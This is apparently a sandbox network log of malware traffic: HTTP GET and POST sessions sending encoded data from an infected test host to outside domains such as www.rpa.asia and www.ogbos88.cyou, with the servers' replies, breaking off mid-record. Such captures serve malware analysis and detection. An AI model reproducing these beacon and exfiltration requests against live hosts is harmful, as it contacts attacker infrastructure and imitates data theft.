Jan 13, 2025 10:26:11.322402954 CET	6679	OUT	Data Raw: 42 2f 6d 6e 74 50 33 7a 43 47 62 4e 42 74 51 66 79 58 75 70 56 4a 43 77 73 50 7a 70 4c 50 54 6f 50 32 48 77 36 6f 43 76 68 71 68 53 35 76 43 6e 74 58 78 48 72 77 4a 6b 59 4d 6b 4b 75 73 53 43 6f 56 7a 57 48 53 6d 33 56 75 71 4a 65 57 47 41 51 62 Data Ascii: B/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0Pr
Jan 13, 2025 10:26:11.424663067 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.11.20	49843	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:13.960573912 CET	530	OUT	GET /t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:26:14.065469027 CET	374	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 13 Jan 2025 09:26:14 GMT content-length: 253 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 31 47 64 5a 3d 76 55 4e 33 26 41 75 50 46 33 76 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.11.20	49844	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:19.439790010 CET	787	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d Data Ascii: AuPF3v=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
Jan 13, 2025 10:26:19.803921938 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:26:19 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:26:19.803932905 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.11.20	49845	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:22.325917959 CET	807	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d Data Ascii: AuPF3v=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
Jan 13, 2025 10:26:22.686233997 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:26:22 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:26:22.686261892 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.11.20	49846	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:25.210947990 CET	2578	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 [TRUNCATED] Data Ascii: AuPF3v=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2kfY0Llbh/ZkQDNq60vMEkMsSnyIRuWYpcMX3gOqpZp2mQ/dYYHfWcrOLPaTWI+ [TRUNCATED]
Jan 13, 2025 10:26:25.210978985 CET	3867	OUT	Data Raw: 56 35 79 2f 52 44 70 74 5a 7a 32 62 2b 31 6a 37 2b 79 55 35 41 55 42 64 72 53 69 4d 6c 44 52 52 6f 56 65 71 6b 6c 69 67 61 59 65 67 64 76 2b 52 54 73 67 2b 34 73 55 45 2b 33 31 65 2f 4d 6f 30 4a 4d 51 74 75 46 39 58 75 50 30 39 78 4b 4d 6b 68 2f Data Ascii: V5y/RDptZz2b+1j7+yU5AUBdrSiMlDRRoVeqkligaYegdv+RTsg+4sUE+31e/Mo0JMQtuF9XuP09xKMkh/ydEFXUL6Ch06TbOdvPBekA4FyRislw6WhoIoX5dusRWgFfJ43w5Fif4e/udovXehnvfG9LjCS8Cf7MAQPxo3K8IVwLZvz8zjrZ5ti6uaOiQ9T7FHwlnMeo4IGyriuGq3pg9Uklq+QTr+UuiSbfnJxGO++Z0kLwULn
Jan 13, 2025 10:26:25.211050987 CET	1511	OUT	Data Raw: 49 5a 37 2b 59 6c 73 38 4d 4e 65 4d 33 63 62 6a 31 51 77 70 4c 44 35 52 6a 46 43 54 6b 38 42 78 61 5a 64 39 37 37 57 76 32 4d 79 48 45 58 34 58 4d 54 30 79 31 62 68 77 79 62 4b 47 41 4d 59 6f 51 53 6e 4a 71 43 47 4a 55 48 56 7a 77 30 4e 61 39 37 Data Ascii: IZ7+Yls8MNeM3cbj1QwpLD5RjFCTk8BxaZd977Wv2MyHEX4XMT0y1bhwybKGAMYoQSnJqCGJUHVzw0Na97NWzjoDegciFWGj6+oQqiBhimJ92KcsCqE1GrhfsFLeVq2CGzMknTVHx0n7uw4QuAqbk/1HONxnLYfj1CGY+vPGCyUPAiI+3JdkWfLWEWhM1Oi1lVcWR2ioIlTQRVUeTdTrFQoVWxv9xD+3vHzWigsx1fcTJJSNl/V
Jan 13, 2025 10:26:25.566783905 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:26:25 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:26:25.566801071 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.11.20	49847	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:28.100589037 CET	526	OUT	GET /bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3 HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:26:28.456989050 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:26:28 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:26:28.457005978 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.11.20	49848	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:33.579308987 CET	799	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 